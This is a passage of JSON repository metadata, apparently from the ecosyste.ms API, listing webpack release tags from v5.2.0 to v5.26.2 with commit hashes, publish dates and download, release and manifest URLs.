webpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webp